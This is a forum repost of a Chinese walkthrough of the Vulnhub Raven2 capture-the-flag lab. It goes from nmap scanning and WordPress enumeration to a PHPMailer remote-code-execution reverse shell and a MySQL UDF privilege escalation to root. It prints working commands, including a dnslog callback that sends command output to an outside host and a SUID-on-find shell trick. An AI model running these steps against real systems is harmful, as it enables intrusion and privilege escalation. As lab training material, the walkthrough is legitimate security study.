【Vulnhub系列】Vulnhub_Raven2靶场渗透(原创)

打印 上一主题 下一主题

主题 997|帖子 997|积分 2991

【Vulnhub系列靶场】Vulnhub_Raven2 渗透

原文转载已颠末授权
原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)
一、环境准备

从网盘下载该靶机,在vm中选择【打开】

然后设置好存储路径,开机后查抄靶机的网络连接模式是否为【NET】模式。
二、信息收集

1、主机发现

  1. nmap.exe -sn 192.168.31.*
复制代码

2、端口扫描

1、先进行大略的扫描
  1. nmap.exe -F 192.168.31.60
复制代码

2、再进行精细化扫描
  1. nmap.exe -sT --min-rate 10000 -p- 192.168.31.60
  2. nmap.exe -sU --min-rate 10000 -p- 192.168.31.60
复制代码


3、进行全扫描和毛病探测
  1. nmap.exe -sT -sV -sC -O -p 22,80,111,54798,58157 192.168.31.60 -oA AllPort
  2. nmap.exe --script=vuln -p 22,80,111,54798,58157 192.168.31.60 -oA VulnPort
复制代码

确认是Linux操纵体系,而且开放了111的rpcbind服务,有关这个服务可以上网搜索,也有很多该服务相干毛病,后期是一个可使用的点。

发现使用了wordpress框架,进行了目录的扫描,还发现有一个csrf 的毛病,不过这个毛病在个人渗透过程中起到的作用微乎甚微。
3、web目录探测

  1. dirsearch.cmd -u http://192.168.31.60 -x 404,403        #过滤404、403
复制代码

看到有wordpress,疑似wordpress搭建的博客网站。
4、web框架探测

  1. whatweb http://192.168.31.60        #在kali中用whatweb进行识别
复制代码

并未探测到wordpress框架,那我们去探测wordpress这个路径

可以看到确定使用了wordpress框架。
三、得到shell驻足点

1、敏感信息检察

1、.DS_Store文件:是macOS 操纵体系的文件类型。它是由 Finder(Mac 上的文件管理器)创建的潜伏文件,用于存储有关特定文件夹的视图选项和元数据。
可以用GitHub的工具对其进行解析:https://github.com/gehaxelt/Python-dsstore
  1. python main.py .DS_Store
复制代码

并没有发现有用的信息
2、Vendor路径信息收集

vendor/PATH:发现了一个flag1

在/vendor/readme.md中发现PHPMailer,百度百科解释:是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。

/vendor/VERSION发现版本为5.2.16

有关这个版本的毛病也有很多

3、wordress框架信息收集

继续将目标转移至 wordpress目录框架,对该目录再进行一次目录扫描

我们访问wp-admin的时候发生了错误:

一而再三简直认是wordpress 框架,这里不应该报错,大概是hosts解析。
我们打开体系组件中的hosts 文件

添加如下当地hosts 文件的IP解析

重新打开即可。

wp-content/uploads路径下发现了flag3

4、wordpress框架使用工具-wpscan

wpscan是专门针对wordpress使用的工具:
1、用户名扫描
  1. wpscan --url http://192.168.31.60/wordpress/ --enumerate u
复制代码

有steven michael两个用户,将其生存在user.txt文件中
2、进行暗码爆破
我们可以用暗码生成工具cewl 针对wordpress生成专门的暗码
  1. cewl http://192.168.31.60/wordpress/ -w pass.txt
复制代码

之后在进行爆破
  1. wpscan --url "http://192.168.31.60/wordpress/" -P "pass.txt" --usernames user.txt
复制代码


为了增长爆破的概率,我在用户名中增长了admin、root两个用户,但是依然爆破失败。我们可以用自己的字典多次实验。以及使用wpscan针对wordpress 的主题和插件毛病进行扫描使用。
5、getshell

wordpress使用较为困难,我们将目光再转向PHPMailer。
我们优先使用如下几个远程代码执行脚本

将四个脚本复制到本路径下
  1. cp php/webapps/40968.sh /c/Users/Administrator/Desktop/test/script/
复制代码

在40974.py中,我们修改脚本内容如下,同时在当地起一个4444的监听

然后执行该脚本,访问contact.php文件,会生成shell.php 文件,内容则是反弹shell,再访问shell.php,则拿到shell

四、提权至root

1、翻找敏感文件

1、数据库的账号暗码
我们知道在wordpress 框架下可以找到数据库的账号暗码,在wp-config.php 文件中

拿到MYSQL 数据库的账号暗码:root:R@v3nSecurity
还是一个高权限的账号暗码,大概存在数据库提权。
2、/etc/passwd文件
找到两个普通用户michael、steven
这两个用户名跟用wpscan工具扫描出来的wordpress用户名一样。
3、/home 目录
普通用户目录下也一无所获

4、用find 命令查找高权限文件
  1. find / -perm -u=s -type f 2>/dev/null
复制代码

并没有找到能提权的文件
2、数据库UDF提权

我们此时有数据库的高权限用户,可以实验数据库提权
1、我们先进入交互式shell,然后再进行数据库连接
  1. shell=/bin/bash script -q /dev/null
复制代码

2、查询是否满足UDF提权条件
  1. select user();
  2. select version();
  3. show global variables like 'secure%';
  4. show variables like 'plugin%';
复制代码

满足全部条件
3、查找udf提权的脚本并复制到本目录
  1. searchsploit.cmd udf
  2. cp exploits/linux/local/1518.c /c/Users/Administrator/Desktop/test
复制代码

4、在当地进行编译
  1. gcc -g -c 1518.c
  2. gcc -g -shared -Wl,-soname,raptor_udf2.so -o 111.so 1518.o -lc
复制代码

5、上传至靶机/tmp目录
  1. python3 -m http.server
  2. #在靶机
  3. cd /tmp
  4. wget http://192.168.31.50:8000/111.so
复制代码
6、之后按照udf提权姿势操纵
  1. use mysql;
  2. create table foo(line blob);
  3. insert into foo values(load_file('/tmp/111.so'));
  4. select * from foo into dumpfile '/usr/lib/mysql/plugin/111.so';
  5. create function do_system returns integer soname '111.so';
  6. select * from mysql.func;
复制代码
7、使用dnslog平台进行测试
  1. select do_system("whoami")
复制代码
假如不进行dnslog回显,结果将是如下:

我们使用dnslog 平台进行回显:
  1. select do_system("ping -c 1 `whoami`.hhk1dh.dnslog.cn");
复制代码


3、获取root权限

这个时候我们可以以root权限执行任何命令,我们给find 命令SUID权限,然后通过find进行提权
1、确认find 的位置
  1. select do_system("ping -c 1 `which find`.hhk1dh.dnslog.cn");
复制代码

2、给find SUID权限
  1. select do_system("chmod u+s /usr/bin/find");
复制代码
3、find 命令进行提权
  1. find . -exec "/bin/sh" \;
复制代码

原文转载已颠末授权
更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

不到断气不罢休

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表